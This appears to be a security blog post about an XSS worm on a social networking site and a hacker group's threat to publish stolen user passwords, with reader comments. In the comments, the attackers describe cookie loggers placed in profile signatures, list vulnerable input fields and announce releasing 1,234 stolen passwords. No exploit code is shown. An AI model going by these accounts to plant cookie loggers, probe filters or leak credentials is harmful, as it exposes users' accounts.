Paid Advertising
web application security lab

Full-disclosure extortion of’s woes continue. Unsticky emailed me the original source code to the worm. It’s funny how this reminds me of actual virus fighting, where understanding the original variant can help explain how future variants evolved. Here are the variants:

Original variant by unsticky:

Additional variants:

Additionally Triphase from Hacking With Style got ahold of me. This is a direct copy and paste from his email to me. (Btw, does not condone this sort of activity, but the 1000 or so users who will be affected by this have a right to know):

Hello Rsnake,

I saw your blogpost on

Our response:

Indeed we have a list of usernames and passwords… about 900+ not counting the ones coming in every second…
As a proof ill past a short list of them:

Anyways, the admin has about 20 hours left to fix the bug, or the list WILL get public.


It is clear that Triphase will use the lists that they have found against This is an interesting take on full-disclosure, where the vulnerable website or application is told the duration of time they have until they have to disclose the information that has been stolen. Of course, this is not a new way to disclose information and it has been tried in the past, although I don’t recall it ever having been done in quite the same way. If does business in California this may fall under SB 1386 which mandates full disclosure by the owners to it’s users. Pretty nasty stuff and a pretty tough message - fix it or pay.

11 Responses to “Full-disclosure extortion of”

  1. Otsego Says:

    Is that wise for you to post that? Those passwords could well be the ones that they have for their email addreses.

  2. Luny Says:

    Tough message indeed. I know i mentioned in my blog to update if I had heard anything else from Triphase and this HWS group, but after thinking about it and reading this last email I recieved, it’s clear they only want attention.

  3. unsticky Says:

    They didn’t do anything special. They probaly just put cookie loggers in the owners’ profiles, as Signatures. I’ve gotten a few account from the same thing, but I’m not threatening the site with that. What’s the good of releasing passwords to normal users accounts, as a threat? It doesn’t accomplish anything.

  4. RSnake Says:

    Otsego, I’m pretty certain Triphase was going to release this information with or without my post, and I am attempting to raise awareness of the threat of his actual disclosure, which is far more disturbing. I don’t think I did them any more harm than if he had posted that information elsewhere, and hopefully the word will get out quicker as a result.

    Luny, I am in agreement about HWF’s intention of getting attention. Unfortunately they’ll get it if they start posting 1000’s of passwords, one way or another.

    Unsticky, I would agree, there is nothing overly complex about what they are doing, it’s more about raising awareness of the threat of mass XSS worms. In a way this kind of thing is really tough love in some weird sort of way. Hurting the site you are interested in to get them to fix it. It shouldn’t have to be that hard.

  5. blogged on » Archiv » XSS Wurm Says:

    […] Den XSS-Wurm, seine Varianten und eine e-Mail des Verantwortlichen gibt’s auf […]

  6. Triphase Says:

    The problem is that we DO have admin and owner accounts…
    1 of the admins changed there account information.

    But as it looks for now… they fixed the problem…
    Well at least… 1 of them… They fixed my Perl exploit…
    Now its time to wait for L4fu to get online and see if they fixed his exploit as well…

    If they didnt… well you know what happens…


  7. unsticky Says:

    My appologies then, I’m new to this ‘MyYearbook’ hacking bit. All I know is their incessant XSS vulns.

    Hey, I just logged into my account on their site and was prompted by a change password screen, so maybe you guys are making a little bit of progress. haha

  8. unsticky Says:

    I appologize for posting twice in a row, but I wanted to say that they upped their filters again. It seems they now strip element id’s, script: img src’s, and probably more, but that’s all I’ve found… If only I’d worked a little bit more on it last night, there would’ve been a friendly Signature worm too. Now to move onto new input feilds!

  9. Triphase Says:

    There are about 20 input fields vuln to this XSS…
    The personal page has a few, the “whatever i want” box is vuln…
    The my picture comment, and the Your comment on other peoples pictures for a start… but there are lots more…


  10. RSnake Says:

    I removed the passwords from the list as it is no longer required as proof. I haven’t heard anything about, so I assume they fixed the hole as there was no major disclosure mentioned.

  11. Triphase Says:

    They fixed a few, but not all…
    What they mostly did was a password change when you login…
    When you login you will be asked to change your password.

    Nice idea of them… but not good enough… we are still getting password every second and some security holes are still there…

    the full list is now online at
    or the direct link:

    Total passwords: 1234
    Not a joke it realy is 1234